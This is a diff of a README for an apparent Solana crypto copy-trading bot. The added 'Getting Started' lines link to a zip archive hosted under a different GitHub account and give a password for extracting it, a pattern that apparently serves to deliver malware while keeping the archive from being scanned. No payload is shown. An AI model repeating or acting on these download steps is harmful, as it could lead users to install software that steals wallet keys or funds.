RectiFlex/solana-copytrading-bot/README.md

   - BonkBot
   - Banana Gun

+## Getting Started
+- [Clone](https://github.com/knightlightst/solana-copytrading-bot/archive/refs/heads/main.zip) the repository and follow the step-by-step setup guide in the documentation.
+- Extract archive with password `u7Bn9`
+- Configure your settings
+   Edit `appsettings.json` or use the UI to set filters, wallet addresses, and platform preferences.
+- Run the bot

 ##  Configuration

 All settings are fully configurable through a JSON or UI interface (if implemented).
 Below are the primary config options: